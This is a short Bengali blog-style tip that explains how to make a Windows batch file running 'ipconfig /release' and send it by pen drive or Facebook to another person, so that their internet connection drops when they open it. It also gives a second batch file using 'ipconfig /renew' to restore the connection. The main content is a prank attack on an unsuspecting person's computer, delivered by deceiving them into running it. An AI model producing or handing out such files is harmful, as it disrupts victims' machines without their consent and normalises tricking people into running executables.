Notepad ওপেন করেন @Echo off Ipconfig /release কোডটি লিখেন Save as এ ক্লিক করেন ফাইলনেম Trickbd.bat দিয়ে সেভ করেন এবার যার পিসির নেট অফ করবে তাকে পেন্ড্রাইভ দিয়ে অথবা ফেসবুকে সেন্ড করুন, এটা ওপেন করলেই তার পিসির নেট অফ হয়ে যাবে
যেভাবে ঠিক করবেন- Notepad ওপেন করেন @Echo off Ipconfig /renew কোডটি লিখেন Save as এ ক্লিক করেন ফাইলনেম Trickbd2.bat দিয়ে সেভ করেন এবার ফাইলটি ওপেন করলেই আবার নেট কানেকশন ঠিক হয়ে যাবে। **পিসি রিস্টার্ট দেওয়া লাগতে পারে **শুধুমাত্র উইন্ডোজের সব ভার্সনে কাজ করবে
No comments:
Write comments